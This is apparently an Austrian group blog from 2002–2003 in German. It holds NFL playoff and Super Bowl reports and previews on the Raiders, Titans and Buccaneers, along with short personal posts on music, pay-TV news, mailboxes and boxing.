    BERICHT: Das erwartete Punktefeuerwerk!!! Beide Teams begannen mit überzeugenden Drives und erzielten jeweils einen Touchdown. Im zweiten Viertel allerdings sah es 14 Minuten lang so aus als würden Steve McNair (QB) und seine Titans dieses Spiel besser und besser in den Griff bekommen. Eine Minute vor der Halbzeit stand es 17-14 für die Titans, sie hatten die Raiders Offense verhältnismässig gut im Griff und waren im Ballbesitz. Doch genau zu diesem Zeitpunkt wurde dem Quarterback der Titans während des Passversuchs der Ball aus der Hand geschlagen, und die Raiders konnten den Fumble recovern. Der daraus resultierende Drive endete mit einem Touchdown durch Doug Jolley (TE) zum 17-21. Der darauffolgende Kickoff-Return wurde von den Titans sofort wieder gefumbelt und führte zu einem Fieldgoal der Raiders. 24-17 für die Raiders lautete also der Pausenstand, und diese eine letzte Minute war ganz klar der Turning Point dieser Partie. Zwar kamen die Titans durch einen 13 Yard Touchdown-Lauf von McNair im dritten Viertel noch mal auf 27-24 heran, doch im letzten Viertel konnte Oakland durch Touchdowns von Rich Gannon und Zack Crockett (Running Back) noch ungefährdet den Endstand von 41-24 herausspielen. Die Raiders ziehen also durchaus verdient in den Superbowl ein, auch wenn dies Begegnung lange Zeit offen war. Steve McNair spielte zwar eine sehr starke Partie, und lange Zeit machten sich die Raiders durch zu viele Fouls das Leben selber schwer, aber diese Offense der Raiders mit einem Rich Gannon in Höchstform war gestern einfach unstoppable!!! Drei Touchdown-Pässe, ein Touchdown-Lauf und ein Quarterback-Rating von 114.48 sprechen eine deutliche Sprache. Nur ihn allein herauszuheben wäre aber unfair. Durch die Bank alle Raiders spielten gestern in Höchstform. Die Offense Line gab Gannon fast immer sehr viel Zeit seine Pässe an den Mann zu bringen, Charlie Garner konnte sein Running Back Game sehr solide etablieren und die Receiver, hier vor allem der grandiose Jerry Rice, aber auch Tim Brown und Jerry Porter konnten von den Titans nur selten unter Kontrolle gebracht werden. Auch die Defense spielte trotz der kassierten 24 Punkte eine extrem starke Partei. Die Raiders mal ausgenommen hätten die Titans gestern wohl jedes andere Team der NFL besiegt.
    THE RAIDERS ARE HEADING FOR SAN DIEGO!!!!!!

    REPORT & PHOTOS

    AFC CHAMPIONS:
    OAKLAND RAIDERS










    PIRATE BOWL


    vs.



    26.01.03, 23.35 Uhr (live auf ORF1 und SAT1):
    RAIDERS - BUCS: 21-48
    VORSCHAU: Wow, was für ein Duell !!!
    Die beste Offense der NFL (Raiders) trifft am Sonntag in Südkalifornien auf die beste Defense der Liga (Bucs). Eines deshalb gleich vorneweg: Auf Binsenweisheiten wie offense wins games, defense wins championships gebe ich überhaupt nichts. Zumal das hier auch zu vereinfacht dargestellt wäre. Die Offense der Bucs hat zumindest in den letzten beiden Spielen bewiesen, was sie draufhat. Immerhin 58 Punkte aus den zwei Partien gegen die 49ers und die Eagles waren doch sehr beeindruckend. Auch die Defense der Raiders hat sich im Jänner stark gesteigert, so hat sie z.B. nur 10 Punkte gegen die highscoring Jets zugelassen. Zu den einzelnen Mannschaftsteilen komm ich aber später detailliert. Ein weiterer interessanter Aspekt im diesjährigen Superbowl ist die Person Jon „Chucky“ Gruden. Der Headcoach der Bucs war noch letztes Jahr Headcoach der Raiders. Er wurde in der Off-Season für 8 Mio. USD und je zwei Erst- und Zweitrunden Draftpicks verpflichtet. Nun aber der angekündigte Vergleich der Mannschaftsteile:

    Offense:
    Quarterbacks:

    Raiders: Rich Gannon (#12)
    Bucs: Brad Johnson (#14)
    Zwei Pocketpasser par excellence; beide laufen nur ungern selbst. Trotzdem ist Rich Gannon sicherlich der beweglichere der beiden. Der Wurfarm ist bei beiden zirka gleichstark, allerdings ist Gannon bestimmt der präzisere Passer. Auch unter Druck ist dieser länger und eher in der Lage seine Pässe an den Mann zu bringen. Der Hauptvorteil aber ist das Spielverständnis. Rich Gannon kann ein Spiel lesen wie kein anderer Spieler der NFL. Sofort erkennt er das Vorhaben der Defense, stellt situationsabhängig seinen Angriff um und findet fast immer einen passenden Spielzug. Nicht umsonst wurde er heuer zum MVP der Liga gewählt. Brad Johnson hat sich im Laufe dieser Saison sicher sehr stark verbessert, dem Vergleich mit Rich Gannon kann er aber nicht standhalten, nicht nur weil ihm dafür einige Jahre an Erfahrung fehlen.
    Vorteil: Raiders

    Wide Receivers:
    Raiders: Jerry Rice (80), Tim Brown (81), Jerry Porter (84)
    Bucs: Keyshawn Johnson (19), Joe Jurevicius (83), Keenan McCardell (87)
    Zwar haben Rice und Brown den Zenit ihrer Karriere mit 40 bzw. 36 Jahren sicher schon überschritten, aber ihre Erfahrung kann ihnen keiner nehmen. Ich gehe mal davon aus, dass wenn die Raiders am Sonntag gewinnen, Jerry Rice, mindestens einer der besten Spieler aller Zeiten, seine Karriere beendet. Die Receiver der Raiders sind sehr fangsicher. Auch ist Rice trotz seiner 40 Jahre wohl immernoch schneller als z.B. Keyshawn Johnson.
    Vorteil: Raiders

    Running Backs:

    Raiders: Charlie Garner (25),Tyrone Wheatley (47), Jon Ritchie (40)
    Bucs: Michael Pittman (32), Mike Alstott (40), Aaron Stecker (27)
    Das Offense-Spiel der Raiders ist ganz klar auf den Pass aufgebaut. Garner hat zwischendurch immer seine Läufe für etwas Raumgewinn, wird aber meist wohl nur eingesetzt um die Receiver etwas zu entlasten. Mike Alstott (Fullback) hingegen ist immer für starke kraftvolle Läufe durch die Mitte einzusetzen und je länger die Saison dauert desto stärker scheint auch Michael Pittman zu werden. Auf Jon Ritchie von den Raiders ist bezüglich kurzer Läufe (ca. ein Yard) aber immer Verlass. Dieses Duell ist fast ausgeglichen, trotzdem
    Vorteil: Bucs

    Offense-Line:

    Ganz klare Sache; die O-Line der Raiders ist schwerer, stärker und beweglicher als die der Bucs und gibt Gannon zumeist viel Zeit seine Pässe an den Mann zu bringen oder schafft grosse Lücken für die Running Backs.
    Vorteil: Raiders

    Defense:
    Defense-Line:

    Wieder eindeutig; die Bucs D-Line ist der der Raiders klar an Schnelligkeit und Stärke überlegen. Das Duell der Bucs D-Line gegen die O-Line der Raiders wird hochklassig und sehr wichtig für den Ausgang der Partie. Sollte die D-Line der Bucs wirklich starken Druck auf Gannon aus-üben können, wird es für die Raiders extrem schwierig.
    Vorteil: Bucs

    Linebackers:

    Raiders: Bill Romanowski (53), Eric Barton (50), Napoleon Harris (58)
    Bucs: Derrick Brooks (55), Shelton Quarles (53), Alshermond Singleton (51)
    Brooks wurde heuer zum Defense MVP der Liga gewählt, aber die LBs der Raiders brauchen sich vor denen der Bucs keinesfalls zu verstecken. Für mich total ausgeglichen.
    Vorteil: ---

    Secondary (Safeties und Cornerbacks):

    Raiders: Ron Woodson (26), Charles Woodson (24), Tory James (20)
    Bucs: John Lynch (47), Dexter Jackson (34), Ronde Barber (20)
    Auch dieses Duell ist schwer zu entscheiden. In der Passverteidigung schenken sich beide nichts, die etwas höhere Grundschnelligkeit in der Secondary der Bucs macht hier aber den Unterschied.
    Vorteil: Bucs

    Allgemeines :
    Special Teams:

    Ein klares Remis. Beide Teams verfügen über grundsolide Kicker und Punter und auch die jeweiligen Returner und Blocker sind als gleichstark einzuschätzen. Hier entscheidet die Tagesform. Auch die Duelle der Special Teams werden in San Diego sehr wichtig sein.
    Vorteil: ---

    Headcoaches:

    Raiders: Bill Callahan
    Bucs: Jon Gruden
    Chucky Gruden ist zwar der jüngste Headcoach der NFL (39) verfügt aber trotzdem schon über sehr viel Erfahrung, so war er auch Teil der berühmten Class of 92 als Assistant Coach von Mike Holmgren in Green Bay. Bill Callahan ist zwar ein sehr guter Coach, der gemeinsam mit seinem Quarterback immer die besten Plays für sein Team auswählt, trotzdem muss dieser Vergleich an Gruden gehen und zwar nicht zuletzt deshalb, da er ja letztes Jahr noch Coach der Raiders war und dieses Team mindestens so gut kennt wie sein eigenes.
    Vorteil: Bucs

    Wetter:

    Das Wetter spielt am Sonntag keine Rolle. Zwei Schönwetter-Teams treffen im sonnigen Südkalifornien aufeinander.
    Vorteil: ---

    Hmmm... Die Bewertung der verschiedenen Mannschaftsteile ergibt also einen 4:3-Vorsprung für die Bucs (bei drei Unentschieden). Da die ersten zwei Punkte aber sehr wichtig sind, würd ich jetzt mal von einer ausgeglichenen Partie sprechen wollen. Alles ist möglich!!! Die Tagesform, die Duelle der Lines und wahrscheinlich auch die der Special Teams werden am Sonntag entscheiden. Eine Verlängerung ist durchaus möglich. Der ewige Vergleich: 4-1 Raiders
    MEIN TIPP: RAIDERS (27-23)

    --------------------

    WORLD CHAMPIONS:


    BERICHT: Congratz, Bucs!!!
    Das war wirklich eine unglaublich beeindruckende Leistung!!! Knapp drei Viertel lang dominierte die grandiose Defense der Bucs dieses Spiel nach Belieben. Drei Punkte durch ein Field Goal von Sebastian Janikowski im ersten Drive der Raiders war lange Zeit alles, was die Offense der Raiders auf die Beine brachte. Von diesem Zeitpunkt an waren es die Bucs, die punkteten und punkteten und punkteten. Zwei Interceptions durch Dexter Jackson noch in der ersten Hälfte brachten Tampa jeweils in gute Field Position, die sie dann auch jeweils zum Touchdown (durch Mike Alstott und Keenan McCardell) tragen konnten. Nach einem weiteren TD von McCardell und einem Interception Return Touchdown durch Dwight Smith stand es Mitte des dritten Viertel schon 34-3 für die Bucs. Zu diesem Zeitpunkt, als eigentlich so gut wie alles schon entschieden war, bekam man das erste Mal den Eindruck, als würden sich die Raiders wirklich noch gegen die drohende Niederlage aufbäumen wollen. Drei Touchdowns in Folge (#1: 39-Yard-Pass auf Jerry Porter, #2: 13-Yard blocked Punt Return durch Eric Johnson, #3: 48-Yard-Pass auf Jerry Rice) brachten Oakland 3 Minuten vor Schluss noch einmal auf 34-21 heran. Gannon musste nun natürlich alles riskieren und gegen diese Defense war es eigentlich keine grosse Überraschung, dass das einfach nicht gut gehen konnte. Ein weiterer Interception Return Touchdown eine Minute vor Schluss durch Tampas Defensive MVP der Liga, Derrick Brooks, brachte die endgültige Entscheidung für die Bucs, und dieser heulte daraufhin los wie ein Schlosshund. Der letzte Touchdown der Bucs zwei Sekunden vor Schluss, abermals durch einen Interception Return von Dwight Smith, sorgte für das sensationelle Endergebnis von 48-21.
    Die Wahl des Superbowl-MVP fiel auf Dexter Jackson; allerdings muss man sagen, dass sich gestern mindestens vier oder fünf Buccaneers diese Auszeichnung verdient hätten. So spielte zum Beispiel Brad Johnson, Quarterback der Bucs eine sehr starke Partie, kam auf 215 Yards mit zwei Touchdowns und nur einer Interception. Michael Pittman, der lange Zeit stark kritisierte Running Back der Bucs erlief bei 29 Versuchen bemerkenswerte 124 Yards. Simeon Rice, Defense-Liner, kam auf fünf Tackles und zwei Sacks.
    Defensive Coordinator Monte Kiffin: "As far as I am concerned, the whole defense could have won the award." All diesen Statistiken konnten die Raiders an diesem Abend einfach nichts engegensetzen. Rich Gannon, der in der gesamten Regular Season nur 10 Interceptions warf, brachte es allein gestern auf unfassbare 5!!! Sein QB-Rating war 48.9, in der Regular Season hatte er im Schnitt 97.3. Ein Grund dafür war bestimmt auch das Fehlen des etatmässigen Centers der Raiders, Pro-Bowler Barret Robbins, der wenige Stunden vor Spielbeginn unter mysteriösen Umständen in das örtliche Krankenhaus eingeliefert werden musste. Diese schwache Vorstellung der Raiders allerdings allein am Fehlen von Robbins festzumachen wäre zu billig. Man spielt immer nur so gut, wie es der Gegner zulässt; die Bucs haben gestern einfach fast gar nichts zugelassen und haben sich deshalb hochverdient die Vince Lombardi – Trophy und die Superbowl-Ringe geschnappt.
    REPORT & PHOTOS





    :: one life, one year  sTe  30.12.2002 23:03:56



    vor genau einem jahr um diese uhrzeit gings ab ins spital; und um 15.28 CET war sie dann da...
    eine kerze auf der torte ist phantastisch :)
    :: die auswertung  bully  30.12.2002 11:46:11
    vor genau 8 wochen gaben hier auf feelosport 3 leute ihre nfl-play-off-tipps ab. heute, da nun alles klar ist, folgt die auswertung, und ich gratuliere skeletter, der ali und mich um einen punkt auf platz zwei verwiesen hat. bravo!!! der 2 punkte bringende risikotipp giants hat voll eingeschlagen !!!


    abschliessend möchte ich aber noch anmerken, dass eigentlich allen, die einen AFC- oder NFC- besten nicht einmal als playoff-teilnehmer nominiert haben, 2 punkte abgezogen werden sollten!
    (anm.d.red.:bezieht sich natürlich auf die raiders)
    na, wir haben einen verdienten sieger SKELETTER, und ich gratulier ihm hiermit herzlich!!!

    allen sportbegeisterten: HAPPY NEW YEAR!!!
    :: nuovo 2 ?  sTe  28.12.2002 18:47:05
    hat irgendwer schon soein schild gesehen :)

    :: nuovo  sTe  28.12.2002 17:13:31
    ein traum: dieses zwickl
    :: very nice...  bully  27.12.2002 15:17:09


    einen wirklich sehr guten artikel für nicht so nfl-begeisterte zeitgenossen, solche, die sich nicht so gut auskennen und vor allem für alle (4), die mich am mittwoch beim vergleich "football is a mischung aus schach und physis" belächelt haben, gibts HIER.



    ein paar zitate:
    + Erstens ist Football ein faszinierendes Spiel, welches Fußball an Spannung bei weitem übertrifft, da ...
    + So gibt es - wie beim Schach, dem Spiel, welches Football in seiner Strategie-Planung am ähnlichsten ist - ...
    + Otto Sportsfreund meint immer noch, dass bei Football ziemlich brutale Menschen einfach übereinander herfallen und sich um den Ball prügeln. Falsch.
      bully  27.12.2002 11:16:41


    du warst mir in den letzten 16 jahren stets ein treuer wegbegleiter und wirst es auch für immer bleiben, das vergess ich dir nie!!!
    DANKE FÜR ALLES!!!
    :: there´s a light  sTe  23.12.2002 18:48:45

    24  bully  23.12.2002 12:16:42
    23  bully  23.12.2002 00:02:20


    happy 38th birthday!!!
    Congratz!!!  bully  22.12.2002 23:44:44


    JAAAAAA!!!
    I SEE A BIG BLACK HOLE IN THE NFL PLAYOFFS!!!




    viel glück für die playoffs wünsch ich aber auch den


    den


    und den


    ---------------------------------------------------------------------------------------

    und euch allen wünsch ich ein wunderschönes und stressfreies weihnachtsfest!!!

    22  bully  22.12.2002 00:03:16
    21  bully  21.12.2002 00:44:17
    20  bully  20.12.2002 00:01:48
    :: zwan  bully  19.12.2002 21:08:03

    noch vor wenigen tagen schickte ich dem sTe folgende message über icq:
    sehr schöööön!!!
    endlich gibts die legitimen nachfolger von den smashing pumpkins!!! ZWAN!!!
    klingen soooooo ähnlich!!! unglaublich!!!!!


    also, dass zwan ähnlich klingen wie die pumpkins, ist ja eigentlich auch kein wunder, sind doch ausser der darcy und dem iha alle wieder an board.
    billy corgan singt (unüberhörbar!!!) und haut in die seiten und jimmy chamberlin on drums.

    Zwan is the end result of a promise that Billy Corgan made to Matt Sweeney over 10 years ago that he wanted to form another band. During the 90´s Corgan had the urge to write the type of music he wanted that was not tied to the aura of The Smashing Pumpkins, his current band at the time. Once the Pumpkins broke up, Corgan came to Sweeney and told him it was time to work on that project. Hence, Zwan came into existance.

    zwan haben für februar eine europa-tour geplant, bis jetzt gibt es aber leider erst drei termine; einen in london und zwei in deutschland...
    vielleicht kommt ja österreich in den nächsten tagen und wochen auch noch auf den tourkalender. *hoff*

    mich jedenfalls haben zwan schon jetzt restlos überzeugt!!!
    :: premiere  bully  19.12.2002 18:19:20

    allen, die schon seit längerem auf das endgültige aus von premiere warten, sei folgender artikel ans herz gelegt ;-)))

    Berlin, 19. Dez (Reuters):
    Der angeschlagene PayTV-Sender Premiere hat sich als erste Kerngesellschaft des zerfallenen Kirch-Imperiums mit einem neuen Eigentümer auf eine Übernahme geeinigt. Die Verhandlungen über Details der Vereinbarung mit dem Finanzinvestor Permira und den Gläubigerbanken werden sich noch bis ins neue Jahr hinziehen.
    "Eine Einigung über die Grundzüge der neuen Gesellschafterstruktur von Premiere ist heute erzielt worden", teilte der Sender am Donnerstag mit. Die europäische Investmentgesellschaft Permira strebe die Mehrheit an Premiere an. Die Gläubigerbanken BayernLB, HVB und BAWAG wollten eine Minderheitsbeteiligung eingehen, ebenso wie das Premiere-Management. Premiere-Chef Georg Kofler sagte der Nachrichtenagentur Reuters, er rechne mit einem Abschluss der Verträge im ersten Quartal nächsten Jahres. Premiere hatte seit der Insolvenz der Muttergesellschaft KirchPayTV nach einem Investor gesucht, der das Überleben des Senders sichert. Die Schwestergesellschaft KirchMedia ist noch mit dem Bauer-Verlag in Übernahmegesprächen, bei denen es noch vor Weihnachten zu einer Einigung kommen soll.

    KREISE - GLÄUBIGERBANKEN WOLLEN WENIGER ALS 25 PROZENT
    Permira bringt nun offenbar 150 bis 200 Millionen Euro an
    frischem Kapital mit, um Premiere bis zum geplanten Erreichen der Gewinnschwelle im ersten Quartal 2004 zu finanzieren. "Es ist schon klar, dass der Investor gewährleistet, dass Premiere bis zum angepeilten Break-Even durchfinanziert ist", sagte Kofler zu Reuters. Den Finanzierungsbedarf bis zu diesem Zeitpunkt bezifferte er mit 150 bis 200 Millionen Euro. Gegenstand der Verhandlungen seien die genaue Aufteilung der Anteile von Permira, den Gläubigerbanken und dem Management sowie die Behandlung der Kredite, sagte Kofler. In verhandlungsnahen Kreisen hieß es, die Gläubigerbanken würden zusammen einen Anteil von weniger als 25 Prozent anstreben, das Management etwa zehn Prozent. Somit bliebt für Permira, die in mehreren Ländern Europas und in New York vertreten und an Unternehmen mit einem Gesamtumsatz von 17 Milliarden Euro beteiligt ist, ein Anteil von mehr als 65 Prozent übrig.
    Bei der Rückforderung der Kredite würden die Banken sich zunächst zurückhalten, hieß es in den Kreisen. So würden Altkredite an KirchPayTV von 750 Millionen Euro erst dann zurückgezahlt, wenn Premiere wieder schwarze Zahlen schreibt.

    FILMVERTRÄGE MIT US-STUDIOS PARAMOUNT UND COLUMBIA
    Die Gläubigerbanken glaubten daran, dass Premiere nach dem Sanierungskurs von Kofler wieder ein interessantes Investment sei, hieß es in Finanzkreisen. Der notorisch optimistische Südtiroler kann auch einige Erfolge vorweisen. Er halbierte die Kosten des Senders innerhalb weniger Monate und sorgte mit einer neuen Programmstruktur für wieder steigende Abonnentenzahlen.
    Seit Anfang Dezember gewinnt Premiere zwischen 4000 und 6000 neue Kunden pro Tag. Nachdem der Sender die Zahl von 2,5 Millionen Kunden im November überschritten hat, peilt Kofler die Marke von 2,6 Millionen Abonnenten im nächsten Vierteljahr an. Auch bei der Programmversorgung verkündete Premiere am Donnerstag Fortschritte. Mit dem US-Studio Paramount habe Premiere einen Liefervertrag über fünf Jahre unterzeichnet und von Columbia ein großes Filmpaket erworben. Nun habe Premiere mit sieben Hollywood-Studios Filmverträge geschlossen. Die Verhandlungen mit Disney liefen weiter, sagte Kofler. Mit einer Einigung rechne er hier ebenfalls bis April 2003.
    19  bully  19.12.2002 00:00:57
    :: art  sTe  18.12.2002 17:08:10
    surreal art cocktails. scary drink animation featuring Pollock, Dali, Picasso, Bosch and more...

    also great: this and this
    :: parking  sTe  18.12.2002 09:16:22
    yeah, ich bin fuer den pilotversuch von m-parking ausgewaehlt worden! und ich werde meinem auftrag: "Es ist aber notwendig, dass Sie während des Testbetriebes regelmäßig und häufig Kurzparkzonen benützen" liebend gerne nachkommen;
    und das 3 monate lang...
    18  bully  18.12.2002 00:01:54

    happy 59th birthday!!!
    :: übertriebenes Briefkastensterben  bully  17.12.2002 18:00:58

    was is da los? ja wo sind sie denn alle hin???

    nach fertigstellen der weihnachtspost mach ich mich auf den weg zum briefkasten. eh klar ohne jacke, haube und handschuhe, nur mit pullover bekleidet die briefe in der hand, schliesslich is er ja eh gleich gegenüber.
    leider muss ich feststellen, dass da wo jahrelang ein briefkasten hing, nur ein heller fleck auf seine einstige existenz hinweist.
    also dann halt auf zum nächsten, da unten beim freihaus ist doch auch einer...
    dort angekommen: grrrr, auch nimma da!!!
    ... auf zum nächsten, der is da unten bei der apotheke.
    dort angekommen: WAAAAAAAH, AUCH WEG!!!!!!
    innerlich koch ich und verfluche die post, äusserlich wird mir immer kälter. brrrr
    und wo is jetzt der nächste briefkasten??? aja, da gegenüber von der TU.
    na bitte!!!!! wenigstens der is noch da!!!!!
    aber die kuverts sind nass vom schnee und mir is saukalt.
    diese odyssee tu ich mir nächstes jahr nimma an!!
    wird zeit, dass sich auch die diversen grosseltern pcs mit internet-anschluss zulegen!!!

    um dieses thema geht es heute auch in am schauplatz, 22.30 Uhr ORF2.
    :: dark  sTe  17.12.2002 16:13:11
    amazing wallpapers

    KNOPPIX 3.1 sieht recht praktisch aus - ein komplettes system, allein mit dem cd-rom lauffaehig, kommt ab sofort als rescue-system bzw um zu testen bei mir zum einsatz...

    17  bully  17.12.2002 00:03:44
    16  bully  16.12.2002 00:00:51
    15  bully  15.12.2002 00:01:30
    14  bully  14.12.2002 00:03:11
    13  bully  13.12.2002 00:55:05
    Hurra die EM ist da!!!!  sTe  12.12.2002 14:42:25
    12  bully  13.11.2002 00:01:41
    11  bully  13.10.2002 00:15:02
    :: NFL - THE ROAD TO THE PLAYOFFS  bully  12.10.2002 14:24:03

    Die Entscheidung in der NFL rückt mit grossen Schritten näher. Nur noch drei Spieltage sind es bis zum Ende der regulären Saison.
    Zeit einen Blick auf die eventuellen Play-Off-Kandidaten zu werfen.

    :: Alles klar in der NFC

    In der NFC scheint schon jetzt alles klar zu sein. Zwar sind die Plazierungen noch recht offen, aber die Teilnehmer an der Postseason sind so gut wie fix:
    :: AFC - Impossible To Say

    Ganz anders als in der NFC verhält es sich in der AFC. Es ist hier zur Zeit noch unmöglich zu sagen, wer es in die Play-Offs schafft. Sage und Schreibe 13 der 16 Teams haben durchaus gute Chancen auch im Jänner noch im Bewerb zu sein, deshalb ist es hier nun von Nöten die AFC Division für Division zu betrachten.
    Zuvor noch kurz zur Erklärung: die vier Divisionssieger und die zwei nächstbesten Mannschaften (Wildcard-Teams) erreichen die Play-Offs. Die Zahlen in Klammer geben die Anzahl an Siegen - Niederlagen an.

    AFC East:
    1. Miami Dolphins (8-5)
    2. New England Patriots (8-5)
    3. New York Jets (7-6)
    4. Buffalo Bills (6-7)

    Miami spielt noch gegen Oakland (9-4), in Minnesota (3-10) und in New England (8-5). Meine Prognose: ein Sieg (Minnesota), zwei Niederlagen. Damit lägen sie am Ende bei 9-7.
    New England spielt noch in Tennessee (8-5), in New York (Jets) (7-6) und gegen Miami (8-5). Meine Prognose: zwei Siege, eine Niederlage (Tennessee) -> 10-6
    New York spielt noch in Chicago (3-10), in New England (8-5) und gegen Green Bay (10-3). Meine Prognose: ein Sieg (Chicago), zwei Niederlagen -> 8-8
    Buffallo spielt noch gegen San Diego (8-5), in Green Bay (10-3), und gegen Cincinnati (1-12). Meine Prognose: ein Sieg (Cincinnati), zwei Niederlagen -> 7-9

    Demzufolge würden die Patriots die Division gewinnen und in die Play-Offs einziehen. Offensichtlich kommt es hier zu einem echten Finale am letzten Spieltag (29.12.).

    AFC North:
    1. Pittsburgh Steelers (7-5-1)
    2. Cleveland Browns (7-6)
    3. Baltimore Ravens (6-7)
    4. Cincinnati Bengals (1-12)

    Pittsburgh spielt noch gegen Carolina (5-8), in Tampa Bay (10-3) und gegen Baltimore (6-7). Meine Prognose: zwei Siege, eine Niederlage (Tampa Bay) -> 9-6-1
    Cleveland spielt noch gegen Indianapolis (8-5), in Baltimore (6-7) und in Atlanta (8-4-1). Meine Prognose: drei Niederlagen -> 7-9
    Baltimore spielt noch in Houston (4-9), gegen Cleveland (7-6) und in Pittsburgh (7-5-1). Meine Prognose: zwei Siege, eine Niederlage (Pittsburgh) -> 8-8

    Demzufolge würden die Steelers die Division gewinnen und in die Play-Offs einziehen. Offensichtlich kommt es auch hier zu einem echten Finale am letzten Spieltag (29.12.).

    AFC South:
    1. Tennessee Titans (8-5)
    2. Indianapolis Colts (8-5)
    3. Jacksonville Jaguars (5-8)
    4. Houston Texans (4-9)

    Tennessee spielt noch gegen New England (8-5), in Jacksonville (5-8) und in Houston (4-9). Meine Prognose: drei Siege -> 11-5
    Indianapolis spielt noch in Cleveland (7-6), gegen New York (Giants) (7-6) und gegen Jacksonville (5-8). Meine Prognose: drei Siege -> 11-5

    Demzufolge würden die Titans wegen der direkten Duelle die Division gewinnen und in die Play-Offs einziehen.

    AFC West:
    1. Oakland Raiders (9-4)
    2. San Diego Chargers (8-5)
    3. Denver Broncos (7-6)
    4. Kansas City Chiefs (6-7)

    Oakland spielt noch in Miami (8-5), gegen Denver (7-6) und gegen Kansas City (6-7). Meine Prognose: drei Siege -> 12-4
    San Diego spielt noch in Buffallo (6-7), in Kansas City (6-7) und gegen Seattle (4-9). Meine Prognose: drei Siege -> 11-5
    Denver spielt noch gegen Kansas City (6-7), in Oakland (9-4) und gegen Arizona (5-8). Meine Prognose: zwei Siege, eine Niederlage (Oakland) -> 9-7

    Demzufolge würden die Raiders die Division gewinnen und in die Play-Offs einziehen. Wenn aber Denver am vorletzten Spieltag (22.12.) in Oakland gewinnt, würden sich die Chargers mit drei Siegen den Divisionstitel sichern können. Zwar hätten sie dann die selbe Bilanz (11-5) wie die Raiders und das direkte Duell wäre unentschieden (1-1), aber die Chargers hätten innerhalb der eigenen Division mehr Siege auf dem Konto.
    Diese Division ist aber ohnehin nicht vorhersagbar, da ich ja eigentlich selber nicht glaub, dass die wirklich sehr starken Chiefs alle drei Spiele (in Denver, gegen San Diego und in Oakland) verlieren.
    Und somit würd alles wieder ganz anders aussehen. Auch glaub ich eigentlich nicht, dass die Broncos nicht in die Play-Offs kommen, aber egal jetzt...

    Angenommen aber dass alle meine Prognosen aufgehen (was natürlich äusserst unwahrscheinlich ist!) wären die Play-Off-Teams der AFC folgende:
    :: Die Play-Off-Teilnehmer

    2 Spieltage vor Ende der regulären Saison sind in der gesamten NFL folgende Teams schon fix für die Play-Offs qualifiziert:
    :: xmas links  sTe  12.10.2002 11:25:04
    um die weihnachtsstimmung ein wenig anzukurbeln, hier mal ein paar links:
    -adventstandard
    -adventpresse
    -mehr links auf wienweb
    10  bully  13.09.2002 00:02:30
    :: Italien in der Krise  utility  12.09.2002 13:51:02
    Schockmeldung von Freitag: die italienische Nationalmannschaft wird, beginnend mit Jänner, vier Jahre lang in PUMA-Dressen gesteckt. mehr...
    9  bully  13.08.2002 00:02:06
    8  bully  13.07.2002 03:02:28
    :: Wladimir KlitschkO vs. Jameel McCline  bully  12.07.2002 14:15:12

    Im Mandalay Bay Resort in Las Vegas, Nevada, kommt es heute Nacht (4:00 Uhr CET, ZDF) zum Kampf um den WM-Gürtel im Schwergewicht der WBO.
    Der jüngere der beiden KlitschkO-Brüder, Wladimir (eine Niederlage, 40 Siege, 33 davon durch K.O.), trifft in einer Pflichtverteidigung auf den Nummer1-Herausforderer Jameel "Big Time" McCline (zwei Niederlagen, drei Unentscheiden, 28 Siege, 14 davon durch K.O.; seine letzte Niederlage ist allerdings schon über 6 Jahre her!).
    Glaubt man den Meldungen der einschlägigen amerikanischen Presse wird das heute wohl der schwerste Kapf in der Karriere des ukrainischen Doktors der Sportwissenschaften und Philosophie.
    Ich bin zwar auch der Meinung, dass das keine "gmahte Wiesn" wird, denke aber schon, dass dieser Kampf entweder mit einem späten K.O. (6., 7. Runde) oder einem klaren Punktesieg für Wladimir Klitschko endet.
    Janne Romppainen (Eastside Boxing): "McCline is without a question a top-ten fighter and whoever wins the match-up will be universally recognized as the most deserving contender for Lewis."

    Und damit kommen wir auch schon zu Lennox Lewis (zur Zeit wohl noch das Mass aller Dinge im Schwergewicht) und seinen Plänen für die Zukunft:
    -1- Im Frühling 2003 besiegt er Vitali KlitschkO, dieser Kampf ist schon unter Dach und Fach.
    -2- Im Winter 2003 (Dezember?) besiegt er zum zweiten Mal Mike Tyson.
    -3- Im Herbst 2004 besiegt er Wladimir KlitschkO und tritt danach als "Undisputed Heavyweight Champion of the World" (Weltmeister aller Klassen) zurück.
    So sieht es zumindest Lewis´ Management.

    Für mich gibts diesbezüglich zwei Möglichkeiten:
    1.) Er besiegt Vitali KlitschkO und Tyson, verliert aber dann gegen Wladimir, tritt ein Jahr später zum Refight an, verliert abermals und beendet seine Karriere oder
    2.) Er verliert schon im März gegen Vitali, kämpft dann im Spätherbst gegen Wladimir, verliert auch da und tritt endgültig zurück.
    Einmal schon standen sich diese beiden Ausnahmeathleten (Lennox Lewis und Wladimir KlitschkO) im Ring gegenüber, damals allerdings nur für die Dreharbeiten zum Film Ocean´s Eleven.

    Aber das ist alles Zukunftsmusik. Damit es überhaupt soweit kommt, muss eben Wladimir heute Nacht gewinnen. Davon aber bin ich felsenfest überzeugt, und nicht nur ich...
    Jason Probst, Maxboxing: "KlitschkO carries an excellent left hook in addition to a potent jab and right... And he fights big... his size and imposing tools to limit the offense coming his way. It’s hard to remember any heavyweight who was so offensive yet got hit so little as Wladimir does."

    Allen, die heute nacht nicht so lange aufbleiben oder so früh aufstehen wollen, empfehle ich das morgige ZDF Sport EXTRA (15:30 Uhr!). Dort gibts die Zusammenfassung und Analysen.
    7  bully  13.06.2002 01:31:17
    :: file sharing  sTe  12.06.2002 08:32:56

    ein neuer stern am filesharing himmel scheint aufzugehen: overnet ; der offizielle nachfolger vom stagnierenden edonkey behebt ebendessen schwaeche und kommt ohne server aus, welche in letzter zeit mehr als ueberlastet waren; fuer windows (auch als command line client), linux und mac...
    6  bully  13.05.2002 00:11:57
    :: winterpause  sTe  12.05.2002 14:18:48


    nach einer mehr als durchwachsenen saison mit einem noch schlechteren start in ebendiese, gabs doch noch einen versoehnlichen abschluss (auch wenns das i tuepfelchen - der sieg gegen sturm - schon zum fruejahr zaehlt);
    als 6ter laesst sichs gut ueberwintern, und wir freuen uns aufs neue stadion und auf hoffentlich die eine oder andere verstaerkung!

    erfreulich war auf jedenfall:
    • 3:1 gegen rapid
    • 2:1 gegen sturm
    • 3:2 gegen pasching
    • 5:2 gegen ried
    • 0:0 gegen fak

    weniger erfreulich:
    • 1:5 gegen bregenz
    • 0:1 gegen admira
    • 0:4 gegen fak
    • 0:4 gegen ried


    anyway - es geht aufwaerts...


    5  bully  13.04.2002 00:06:14
    :: 12.12.2002 – JUDGEMENT DAY  bully  12.04.2002 19:29:28

